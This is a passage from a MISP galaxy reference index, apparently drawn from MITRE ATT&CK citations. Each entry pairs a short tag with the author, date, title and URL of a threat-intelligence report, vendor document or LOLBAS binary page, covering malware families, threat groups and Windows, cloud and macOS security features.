The tag is: misp-galaxy:references="GitHub Ultimate AppLocker Bypass List"

Table 15911. Table References

Links

https://github.com/api0cradle/UltimateAppLockerByPassList

UCF STIG Symbolic Links

UCF. (n.d.). Unauthorized accounts must not have the Create symbolic links user right. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="UCF STIG Symbolic Links"

Table 15912. Table References

Links

https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482

FireEye FiveHands April 2021

McLellan, T. and Moore, J. et al. (2021, April 29). UNC2447 SOMBRAT and FIVEHANDS Ransomware: A Sophisticated Financial Threat. Retrieved June 2, 2021.

The tag is: misp-galaxy:references="FireEye FiveHands April 2021"

Table 15913. Table References

Links

https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html

Mandiant APT29 Eye Spy Email Nov 22

Mandiant. (2022, May 2). UNC3524: Eye Spy on Your Email. Retrieved August 17, 2023.

The tag is: misp-galaxy:references="Mandiant APT29 Eye Spy Email Nov 22"

Table 15914. Table References

Links

https://www.mandiant.com/resources/blog/unc3524-eye-spy-email

Trend Micro DRBControl February 2020

Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.

The tag is: misp-galaxy:references="Trend Micro DRBControl February 2020"

Table 15915. Table References

Links

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

Checkpoint MosesStaff Nov 2021

Checkpoint Research. (2021, November 15). Uncovering MosesStaff techniques: Ideology over Money. Retrieved August 11, 2022.

The tag is: misp-galaxy:references="Checkpoint MosesStaff Nov 2021"

Table 15916. Table References

Links

https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/

bencane blog bashrc

Benjamin Cane. (2013, September 16). Understanding a little more about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.

The tag is: misp-galaxy:references="bencane blog bashrc"

Table 15917. Table References

Links

https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/

Juniper DAI 2020

Juniper. (2020, September 23). Understanding and Using Dynamic ARP Inspection (DAI). Retrieved October 15, 2020.

The tag is: misp-galaxy:references="Juniper DAI 2020"

Table 15918. Table References

Links

https://www.juniper.net/documentation/en_US/junos/topics/task/configuration/understanding-and-using-dai.html

Google Cloud IAM Policies

Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud IAM Policies"

Table 15919. Table References

Links

https://cloud.google.com/iam/docs/policies

Juniper Traffic Mirroring

Juniper. (n.d.). Understanding Port Mirroring on EX2200, EX3200, EX3300, EX4200, EX4500, EX4550, EX6200, and EX8200 Series Switches. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Juniper Traffic Mirroring"

Table 15920. Table References

Links

https://www.juniper.net/documentation/en_US/junos/topics/concept/port-mirroring-ex-series.html

U.S. CISA Understanding LockBit June 2023

Cybersecurity and Infrastructure Security Agency. (2023, June 14). Understanding Ransomware Threat Actors: LockBit. Retrieved June 30, 2023.

The tag is: misp-galaxy:references="U.S. CISA Understanding LockBit June 2023"

Table 15921. Table References

Links

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-165a

Auth0 Understanding Refresh Tokens

Auth0 Inc. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.

The tag is: misp-galaxy:references="Auth0 Understanding Refresh Tokens"

Table 15922. Table References

Links

https://auth0.com/learn/refresh-tokens/

baeldung Linux proc map 2022

baeldung. (2022, April 8). Understanding the Linux /proc/id/maps File. Retrieved March 31, 2023.

The tag is: misp-galaxy:references="baeldung Linux proc map 2022"

Table 15923. Table References

Links

https://www.baeldung.com/linux/proc-id-maps

FireEye KEGTAP SINGLEMALT October 2020

Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.

The tag is: misp-galaxy:references="FireEye KEGTAP SINGLEMALT October 2020"

Table 15924. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

Wikipedia UEFI

Wikipedia. (2017, July 10). Unified Extensible Firmware Interface. Retrieved July 11, 2017.

The tag is: misp-galaxy:references="Wikipedia UEFI"

Table 15925. Table References

Links

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

New DragonOK

Miller-Osborn, J., Grunzweig, J. (2015, April). Unit 42 Identifies New DragonOK Backdoor Malware Deployed Against Japanese Targets. Retrieved November 4, 2015.

The tag is: misp-galaxy:references="New DragonOK"

Table 15926. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

Unit 42 Playbook Dec 2017

Unit 42. (2017, December 15). Unit 42 Playbook Viewer. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="Unit 42 Playbook Dec 2017"

Table 15927. Table References

Links

https://pan-unit42.github.io/playbook_viewer/

Unit 42 SeaDuke 2015

Grunzweig, J. (2015, July 14). Unit 42 Technical Analysis: Seaduke. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Unit 42 SeaDuke 2015"

Table 15928. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/07/unit-42-technical-analysis-seaduke/

3OHA double-fork 2022

Juan Tapiador. (2022, April 11). UNIX daemonization and the double fork. Retrieved September 29, 2023.

The tag is: misp-galaxy:references="3OHA double-fork 2022"

Table 15929. Table References

Links

https://0xjet.github.io/3OHA/2022/04/11/post.html

Flashpoint Anonymous Sudan Timeline

Flashpoint. (2023, June 20). Unmasking Anonymous Sudan: Timeline of DDoS Attacks, Affiliations, and Motivations. Retrieved October 10, 2023.

The tag is: misp-galaxy:references="Flashpoint Anonymous Sudan Timeline"

Table 15930. Table References

Links

https://flashpoint.io/blog/anonymous-sudan-ddos-timeline/

AADInternals Azure AD On-Prem to Cloud

Dr. Nestori Syynimaa. (2020, July 13). Unnoticed sidekick: Getting access to cloud as an on-prem admin. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="AADInternals Azure AD On-Prem to Cloud"

Table 15931. Table References

Links

https://o365blog.com/post/on-prem_admin/

Adsecurity Mimikatz Guide

Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.

The tag is: misp-galaxy:references="Adsecurity Mimikatz Guide"

Table 15932. Table References

Links

https://adsecurity.org/?page_id=1821

Kaspersky Lamberts Toolkit April 2017

GREAT. (2017, April 11). Unraveling the Lamberts Toolkit. Retrieved March 21, 2022.

The tag is: misp-galaxy:references="Kaspersky Lamberts Toolkit April 2017"

Table 15933. Table References

Links

https://securelist.com/unraveling-the-lamberts-toolkit/77990/

CrowdStrike Grim Spider May 2019

John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="CrowdStrike Grim Spider May 2019"

Table 15934. Table References

Links

https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/

Unregmp2.exe - LOLBAS Project

LOLBAS. (2021, December 6). Unregmp2.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Unregmp2.exe - LOLBAS Project"

Table 15935. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Unregmp2/

TrendMicro Patchwork Dec 2017

Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.

The tag is: misp-galaxy:references="TrendMicro Patchwork Dec 2017"

Table 15936. Table References

Links

https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf

Kaspersky Careto

Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The Masked APT. Retrieved July 5, 2017.

The tag is: misp-galaxy:references="Kaspersky Careto"

Table 15937. Table References

Links

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

Cymmetria Patchwork

Cymmetria. (2016). Unveiling Patchwork - The Copy-Paste APT. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Cymmetria Patchwork"

Table 15938. Table References

Links

https://web.archive.org/web/20180825085952/https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf

Rapid7G20Espionage

Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="Rapid7G20Espionage"

Table 15939. Table References

Links

https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/

Unit 42 BackConfig May 2020

Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Unit 42 BackConfig May 2020"

Table 15940. Table References

Links

https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/

Secureworks Karagany July 2019

Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.

The tag is: misp-galaxy:references="Secureworks Karagany July 2019"

Table 15941. Table References

Links

https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector

Update.exe - LOLBAS Project

LOLBAS. (2019, June 26). Update.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Update.exe - LOLBAS Project"

Table 15942. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/

Microsoft - Update or Repair Federated domain

Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.

The tag is: misp-galaxy:references="Microsoft - Update or Repair Federated domain"

Table 15943. Table References

Links

https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365

Trendmicro Evolving ThiefQuest 2020

Gabrielle Joyce Mabutas, Luis Magisa, Steven Du. (2020, July 17). Updates on Quickly-Evolving ThiefQuest macOS Malware. Retrieved April 26, 2021.

The tag is: misp-galaxy:references="Trendmicro Evolving ThiefQuest 2020"

Table 15944. Table References

Links

https://www.trendmicro.com/en_us/research/20/g/updates-on-quickly-evolving-thiefquest-macos-malware.html

AWS Update Trail

AWS. (n.d.). update-trail. Retrieved August 4, 2023.

The tag is: misp-galaxy:references="AWS Update Trail"

Table 15945. Table References

Links

https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html

Unit 42 Pirpi July 2015

Falcone, R., Wartell, R. (2015, July 27). UPS: Observations on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April 23, 2019.

The tag is: misp-galaxy:references="Unit 42 Pirpi July 2015"

Table 15946. Table References

Links

https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/

PaperCut MF/NG vulnerability bulletin

PaperCut. (2023, March 8). URGENT MF/NG vulnerability bulletin (March 2023) | PaperCut. Retrieved August 3, 2023.

The tag is: misp-galaxy:references="PaperCut MF/NG vulnerability bulletin"

Table 15947. Table References

Links

https://www.papercut.com/kb/Main/PO-1216-and-PO-1219#product-status-and-next-steps

Url.dll - LOLBAS Project

LOLBAS. (2018, May 25). Url.dll. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Url.dll - LOLBAS Project"

Table 15948. Table References

Links

https://lolbas-project.github.io/lolbas/Libraries/Url/

NJCCIC Ursnif Sept 2016

NJCCIC. (2016, September 27). Ursnif. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="NJCCIC Ursnif Sept 2016"

Table 15949. Table References

Links

https://www.cyber.nj.gov/threat-profiles/trojan-variants/ursnif

TrendMicro Ursnif Mar 2015

Caragay, R. (2015, March 26). URSNIF: The Multifaceted Malware. Retrieved June 5, 2019.

The tag is: misp-galaxy:references="TrendMicro Ursnif Mar 2015"

Table 15950. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-the-multifaceted-malware/?_ga=2.165628854.808042651.1508120821-744063452.1505819992

US Coast Guard Killnet August 17 2022

US Coast Guard Cyber Command. (2022, August 17). US Coast Guard Cyber Command Maritime Cyber Alert 03-22. Retrieved October 9, 2023.

The tag is: misp-galaxy:references="US Coast Guard Killnet August 17 2022"

Table 15951. Table References

Links

https://www.dco.uscg.mil/Portals/9/Maritime%20Cyber%20Alert%2003-22%20KILLNET%20TLP%20WHITE.pdf

USCYBERCOM SLOTHFULMEDIA October 2020

USCYBERCOM. (2020, October 1). USCYBERCOM Cybersecurity Alert SLOTHFULMEDIA. Retrieved November 16, 2020.

The tag is: misp-galaxy:references="USCYBERCOM SLOTHFULMEDIA October 2020"

Table 15952. Table References

Links

https://twitter.com/CNMF_CyberAlert/status/1311743710997159953

win10_asr

Microsoft. (2021, July 2). Use attack surface reduction rules to prevent malware infection. Retrieved June 24, 2021.

The tag is: misp-galaxy:references="win10_asr"

Table 15953. Table References

Links

https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction

Azure AD Conditional Access Exclusions

Microsoft. (2022, August 26). Use Azure AD access reviews to manage users excluded from Conditional Access policies. Retrieved August 30, 2022.

The tag is: misp-galaxy:references="Azure AD Conditional Access Exclusions"

Table 15954. Table References

Links

https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion

Docker Bind Mounts

Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.

The tag is: misp-galaxy:references="Docker Bind Mounts"

Table 15955. Table References

Links

https://docs.docker.com/storage/bind-mounts/

Chrome Roaming Profiles

Chrome Enterprise and Education Help. (n.d.). Use Chrome Browser with Roaming User Profiles. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="Chrome Roaming Profiles"

Table 15956. Table References

Links

https://support.google.com/chrome/a/answer/7349337

Ars Technica GRU indictment Jul 2018

Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="Ars Technica GRU indictment Jul 2018"

Table 15957. Table References

Links

https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/

Remote Management MDM macOS

Apple. (n.d.). Use MDM to enable Remote Management in macOS. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Remote Management MDM macOS"

Table 15958. Table References

Links

https://support.apple.com/en-us/HT209161

Securelist Denis April 2017

Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018.

The tag is: misp-galaxy:references="Securelist Denis April 2017"

Table 15959. Table References

Links

https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/

Microsoft UAC

Microsoft. (n.d.). User Account Control. Retrieved January 18, 2018.

The tag is: misp-galaxy:references="Microsoft UAC"

Table 15960. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/dn742497.aspx

TechNet Inside UAC

Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="TechNet Inside UAC"

Table 15961. Table References

Links

https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx

User Approved Kernel Extension Pike’s

Pikeralpha. (2017, August 29). User Approved Kernel Extension Loading…. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="User Approved Kernel Extension Pike’s"

Table 15962. Table References

Links

https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/

Adlice Software IAT Hooks Oct 2014

Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Adlice Software IAT Hooks Oct 2014"

Table 15963. Table References

Links

https://www.adlice.com/userland-rootkits-part-1-iat-hooks/

cisco_username_cmd

Cisco. (2023, March 6). username - Cisco IOS Security Command Reference: Commands S to Z. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="cisco_username_cmd"

Table 15964. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-t2.html#wp1047035630

Jamf User Password Policies

Holland, J. (2016, January 25). User password policies on non AD machines. Retrieved April 5, 2018.

The tag is: misp-galaxy:references="Jamf User Password Policies"

Table 15965. Table References

Links

https://www.jamf.com/jamf-nation/discussions/18574/user-password-policies-on-non-ad-machines

MacOS Email Rules

Apple. (n.d.). Use rules to manage emails you receive in Mail on Mac. Retrieved June 14, 2021.

The tag is: misp-galaxy:references="MacOS Email Rules"

Table 15966. Table References

Links

https://support.apple.com/guide/mail/use-rules-to-manage-emails-you-receive-mlhlp1017/mac

Kickstart Apple Remote Desktop commands

Apple. (n.d.). Use the kickstart command-line utility in Apple Remote Desktop. Retrieved September 23, 2021.

The tag is: misp-galaxy:references="Kickstart Apple Remote Desktop commands"

Table 15967. Table References

Links

https://support.apple.com/en-us/HT201710

Microsoft Windows Event Forwarding FEB 2018

Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Microsoft Windows Event Forwarding FEB 2018"

Table 15968. Table References

Links

https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

Apple ZShell

Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020.

The tag is: misp-galaxy:references="Apple ZShell"

Table 15969. Table References

Links

https://support.apple.com/HT208050

Kuberentes ABAC

Kubernetes. (n.d.). Using ABAC Authorization. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Kuberentes ABAC"

Table 15970. Table References

Links

https://kubernetes.io/docs/reference/access-authn-authz/abac/

Cisco Umbrella DGA Brute Force

Kasza, A. (2015, February 18). Using Algorithms to Brute Force Algorithms. Retrieved February 18, 2019.

The tag is: misp-galaxy:references="Cisco Umbrella DGA Brute Force"

Table 15971. Table References

Links

https://umbrella.cisco.com/blog/2015/02/18/at-high-noon-algorithms-do-battle/

Exploit Monday Mitigate Device Guard Bypases

Graeber, M. (2016, September 8). Using Device Guard to Mitigate Against Device Guard Bypasses. Retrieved September 13, 2016.

The tag is: misp-galaxy:references="Exploit Monday Mitigate Device Guard Bypases"

Table 15972. Table References

Links

http://www.exploit-monday.com/2016/09/using-device-guard-to-mitigate-against.html

Microsoft DsAddSidHistory

Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.

The tag is: misp-galaxy:references="Microsoft DsAddSidHistory"

Table 15973. Table References

Links

https://msdn.microsoft.com/library/ms677982.aspx

Microsoft 365 Defender Solorigate

Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Microsoft 365 Defender Solorigate"

Table 15974. Table References

Links

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

TechNet Netsh

Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017.

The tag is: misp-galaxy:references="TechNet Netsh"

Table 15975. Table References

Links

https://technet.microsoft.com/library/bb490939.aspx

Demaske Netsh Persistence

Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017.

The tag is: misp-galaxy:references="Demaske Netsh Persistence"

Table 15976. Table References

Links

https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

CrowdStrike Outlook Forms

Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral Movement and Persistence. Retrieved February 5, 2019.

The tag is: misp-galaxy:references="CrowdStrike Outlook Forms"

Table 15977. Table References

Links

https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746

Red Hat PAM

Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES (PAM). Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Red Hat PAM"

Table 15978. Table References

Links

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules

Varonis Power Automate Data Exfiltration

Eric Saraga. (2022, February 2). Using Power Automate for Covert Data Exfiltration in Microsoft 365. Retrieved May 27, 2022.

The tag is: misp-galaxy:references="Varonis Power Automate Data Exfiltration"

Table 15979. Table References

Links

https://www.varonis.com/blog/power-automate-data-exfiltration

Microsoft Disable NTLM Nov 2012

Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.

The tag is: misp-galaxy:references="Microsoft Disable NTLM Nov 2012"

Table 15980. Table References

Links

https://technet.microsoft.com/library/jj865668.aspx

Microsoft SMB Packet Signing

Microsoft. (2008, September 10). Using SMB Packet Signing. Retrieved February 7, 2019.

The tag is: misp-galaxy:references="Microsoft SMB Packet Signing"

Table 15981. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/system-center/operations-manager-2005/cc180803(v=technet.10)

TechNet Applocker vs SRP

Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.

The tag is: misp-galaxy:references="TechNet Applocker vs SRP"

Table 15982. Table References

Links

https://technet.microsoft.com/en-us/library/ee791851.aspx

Microsoft Using Software Restriction

Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.

The tag is: misp-galaxy:references="Microsoft Using Software Restriction"

Table 15983. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/ee791851(v=ws.11)?redirectedfrom=MSDN

OSX Keychain Schaumann

Jan Schaumann. (2015, November 5). Using the OS X Keychain to store and retrieve passwords. Retrieved March 31, 2022.

The tag is: misp-galaxy:references="OSX Keychain Schaumann"

Table 15984. Table References

Links

https://www.netmeister.org/blog/keychain-passwords.html

USNYAG IranianBotnet March 2016

Preet Bharara, US Attorney. (2016, March 24). Retrieved April 23, 2019.

The tag is: misp-galaxy:references="USNYAG IranianBotnet March 2016"

Table 15985. Table References

Links

https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged

UtilityFunctions.ps1 - LOLBAS Project

LOLBAS. (2021, September 26). UtilityFunctions.ps1. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="UtilityFunctions.ps1 - LOLBAS Project"

Table 15986. Table References

Links

https://lolbas-project.github.io/lolbas/Scripts/UtilityFunctions/

Kernel.org Restrict Kernel Module

Vander Stoep, J. (2016, April 5). [v3] selinux: restrict kernel module loading. Retrieved April 9, 2018.

The tag is: misp-galaxy:references="Kernel.org Restrict Kernel Module"

Table 15987. Table References

Links

https://patchwork.kernel.org/patch/8754821/

SentinelOne Valak June 2020

Reaves, J. and Platt, J. (2020, June). Valak Malware and the Connection to Gozi Loader ConfCrew. Retrieved August 31, 2020.

The tag is: misp-galaxy:references="SentinelOne Valak June 2020"

Table 15988. Table References

Links

https://assets.sentinelone.com/labs/sentinel-one-valak-i

Cybereason Valak May 2020

Salem, E. et al. (2020, May 28). VALAK: MORE THAN MEETS THE EYE. Retrieved June 19, 2020.

The tag is: misp-galaxy:references="Cybereason Valak May 2020"

Table 15989. Table References

Links

https://www.cybereason.com/blog/valak-more-than-meets-the-eye

Walmart Roberts Oct 2018

Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping — Advanced Maldoc Techniques. Retrieved September 17, 2020.

The tag is: misp-galaxy:references="Walmart Roberts Oct 2018"

Table 15990. Table References

Links

https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278

vbc.exe - LOLBAS Project

LOLBAS. (2020, February 27). vbc.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="vbc.exe - LOLBAS Project"

Table 15991. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Vbc/

Veil_Ref

Veil Framework. (n.d.). Retrieved December 4, 2014.

The tag is: misp-galaxy:references="Veil_Ref"

Table 15992. Table References

Links

https://www.veil-framework.com/framework/

LOLBAS Verclsid

LOLBAS. (n.d.). Verclsid.exe. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="LOLBAS Verclsid"

Table 15993. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Verclsid/

WinOSBite verclsid.exe

verclsid-exe. (2019, December 17). verclsid.exe File Information - What is it & How to Block. Retrieved August 10, 2020.

The tag is: misp-galaxy:references="WinOSBite verclsid.exe"

Table 15994. Table References

Links

https://www.winosbite.com/verclsid-exe/

Unit 42 VERMIN Jan 2018

Lancaster, T., Cortes, J. (2018, January 29). VERMIN: Quasar RAT and Custom Malware Used In Ukraine. Retrieved July 5, 2018.

The tag is: misp-galaxy:references="Unit 42 VERMIN Jan 2018"

Table 15995. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/

Unit 42 Vice Society December 6 2022

JR Gumarin. (2022, December 6). Vice Society: Profiling a Persistent Threat to the Education Sector. Retrieved November 14, 2023.

The tag is: misp-galaxy:references="Unit 42 Vice Society December 6 2022"

Table 15996. Table References

Links

https://unit42.paloaltonetworks.com/vice-society-targets-education-sector/

Minerva Labs Vidar Stealer Evasion

Minerva Labs. (2021, September 23). Vidar Stealer Evasion Arsenal. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="Minerva Labs Vidar Stealer Evasion"

Table 15997. Table References

Links

https://web.archive.org/web/20221201005558/https://minerva-labs.com/blog/vidar-stealer-evasion-arsenal/

Amnesty Intl. Ocean Lotus February 2021

Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. Retrieved March 1, 2021.

The tag is: misp-galaxy:references="Amnesty Intl. Ocean Lotus February 2021"

Table 15998. Table References

Links

https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf

FireEye APT32 April 2020

Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020.

The tag is: misp-galaxy:references="FireEye APT32 April 2020"

Table 15999. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html

Slack Help Center Access Logs

Slack Help Center. (n.d.). View Access Logs for your workspace. Retrieved April 10, 2023.

The tag is: misp-galaxy:references="Slack Help Center Access Logs"

Table 16000. Table References

Links

https://slack.com/help/articles/360002084807-View-Access-Logs-for-your-workspace

Azure Activity Logs

Microsoft. (n.d.). View Azure activity logs. Retrieved June 17, 2020.

The tag is: misp-galaxy:references="Azure Activity Logs"

Table 16001. Table References

Links

https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs

DOJ GRU Indictment Jul 2018

Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved September 13, 2018.

The tag is: misp-galaxy:references="DOJ GRU Indictment Jul 2018"

Table 16002. Table References

Links

https://www.justice.gov/file/1080281/download

MalwareTech VFS Nov 2014

Hutchins, M. (2014, November 28). Virtual File Systems for Beginners. Retrieved June 22, 2020.

The tag is: misp-galaxy:references="MalwareTech VFS Nov 2014"

Table 16003. Table References

Links

https://www.malwaretech.com/2014/11/virtual-file-systems-for-beginners.html

Ars Technica Pwn2Own 2017 VM Escape

Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.

The tag is: misp-galaxy:references="Ars Technica Pwn2Own 2017 VM Escape"

Table 16004. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

Google VM

Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.

The tag is: misp-galaxy:references="Google VM"

Table 16005. Table References

Links

https://cloud.google.com/compute/docs/instances

Microsoft Virutal Machine API

Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Microsoft Virutal Machine API"

Table 16006. Table References

Links

https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get

Azure Update Virtual Machines

Microsoft. (n.d.). Virtual Machines - Update. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Azure Update Virtual Machines"

Table 16007. Table References

Links

https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update

Azure Virtual Network TAP

Microsoft. (2022, February 9). Virtual network TAP. Retrieved March 17, 2022.

The tag is: misp-galaxy:references="Azure Virtual Network TAP"

Table 16008. Table References

Links

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview

Google VPC Overview

Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Google VPC Overview"

Table 16009. Table References

Links

https://cloud.google.com/vpc/docs/vpc

Volexity Virtual Private Keylogging

Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.

The tag is: misp-galaxy:references="Volexity Virtual Private Keylogging"

Table 16010. Table References

Links

https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

VirusTotal Behavior def.exe

VirusTotal. (2023, July 11). VirusTotal Behavior def.exe. Retrieved July 11, 2023.

The tag is: misp-galaxy:references="VirusTotal Behavior def.exe"

Table 16011. Table References

Links

https://www.virustotal.com/gui/file/7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893/behavior

VirusTotal FAQ

VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019.

The tag is: misp-galaxy:references="VirusTotal FAQ"

Table 16012. Table References

Links

https://www.virustotal.com/en/faq/

